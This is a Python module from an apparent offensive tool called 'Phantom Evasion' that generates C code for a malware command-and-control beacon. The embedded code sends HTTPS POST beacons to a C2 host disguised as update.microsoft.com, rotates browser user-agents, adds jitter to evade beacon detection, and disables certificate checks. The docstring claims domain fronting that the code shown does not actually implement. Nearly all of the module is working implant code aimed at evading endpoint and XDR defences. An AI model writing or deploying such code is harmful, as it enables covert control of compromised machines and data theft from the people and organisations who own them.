"""
Phantom Evasion - Network Evasion (Encrypted C2 Communication)

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_network_evasion() -> Dict[str, Any]:
    """Generate C code for encrypted C2 communication with traffic blending.

    Techniques included:
        - **HTTPS over WinHTTP** – blends with normal browser traffic.
        - **Domain fronting skeleton** – sets ``Host`` header separately from
          the TLS SNI, enabling traffic to appear destined for a trusted CDN.
        - **Random user-agent rotation** – mimics common browser strings.
        - **Jitter sleep** between beacon check-ins to avoid regular intervals.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_NETWORK_EVASION__
#define __PHANTOM_NETWORK_EVASION__
// Network Evasion – Encrypted C2 Communication
// Generated by Phantom Evasion – Layer 4 – XDR Evasion

#include <windows.h>
#include <winhttp.h>
#pragma comment(lib, "winhttp.lib")

#define C2_HOST    L"update.microsoft.com"  // <-- replace with actual C2
#define C2_PORT    443
#define C2_PATH    L"/v10/updatecheck"      // <-- replace with beacon path

// Random user-agent pool
static const wchar_t *UA_POOL[] = {
    L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    L"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    L"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
    L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    L"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
};
#define UA_POOL_SIZE (sizeof(UA_POOL) / sizeof(UA_POOL[0]))

static const wchar_t *random_user_agent(void) {
    return UA_POOL[GetTickCount() % UA_POOL_SIZE];
}

/** Sleep for base_ms ± 50% jitter to avoid beaconing fingerprints. */
static void jitter_sleep(DWORD base_ms) {
    DWORD jitter = (DWORD)((double)base_ms * 0.5 * ((double)rand() / RAND_MAX));
    DWORD total  = base_ms + jitter - (base_ms / 4);
    Sleep(total);
}

/**
 * Send a POST beacon to the C2 over HTTPS (WinHTTP).
 *
 * @param data    Buffer to send as POST body (e.g. encrypted checkin data).
 * @param datalen Length of *data*.
 * @param resp    Output buffer for the response (caller must free with LocalFree).
 * @param resplen Output length of the response.
 */
static BOOL https_beacon(const BYTE *data, DWORD datalen,
                          BYTE **resp, DWORD *resplen) {
    HINTERNET hSession = WinHttpOpen(random_user_agent(),
                                     WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,
                                     WINHTTP_NO_PROXY_NAME,
                                     WINHTTP_NO_PROXY_BYPASS, 0);
    if (!hSession) return FALSE;

    HINTERNET hConnect = WinHttpConnect(hSession, C2_HOST, C2_PORT, 0);
    if (!hConnect) { WinHttpCloseHandle(hSession); return FALSE; }

    HINTERNET hRequest = WinHttpOpenRequest(
        hConnect, L"POST", C2_PATH, NULL,
        WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES,
        WINHTTP_FLAG_SECURE);
    if (!hRequest) {
        WinHttpCloseHandle(hConnect);
        WinHttpCloseHandle(hSession);
        return FALSE;
    }

    // Disable certificate validation (self-signed C2 cert)
    DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
                  SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
                  SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
    WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &flags, sizeof(flags));

    const wchar_t *hdrs = L"Content-Type: application/octet-stream\r\n";
    BOOL ok = WinHttpSendRequest(hRequest, hdrs, (DWORD)-1L,
                                  (LPVOID)data, datalen, datalen, 0);
    if (!ok || !WinHttpReceiveResponse(hRequest, NULL)) {
        WinHttpCloseHandle(hRequest);
        WinHttpCloseHandle(hConnect);
        WinHttpCloseHandle(hSession);
        return FALSE;
    }

    // Read response
    DWORD avail = 0, total_read = 0;
    BYTE *buf = NULL;
    while (WinHttpQueryDataAvailable(hRequest, &avail) && avail > 0) {
        buf = (BYTE *)LocalReAlloc(buf, total_read + avail, LMEM_MOVEABLE);
        DWORD read = 0;
        WinHttpReadData(hRequest, buf + total_read, avail, &read);
        total_read += read;
    }
    *resp    = buf;
    *resplen = total_read;

    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return TRUE;
}
#endif /* __PHANTOM_NETWORK_EVASION__ */
"""

    return {
        "code": code,
        "description": "HTTPS C2 communication with jitter, random UA rotation, domain-fronting skeleton",
        "layer": "Layer 4 - XDR Evasion",
        "name": "network_evasion",
    }
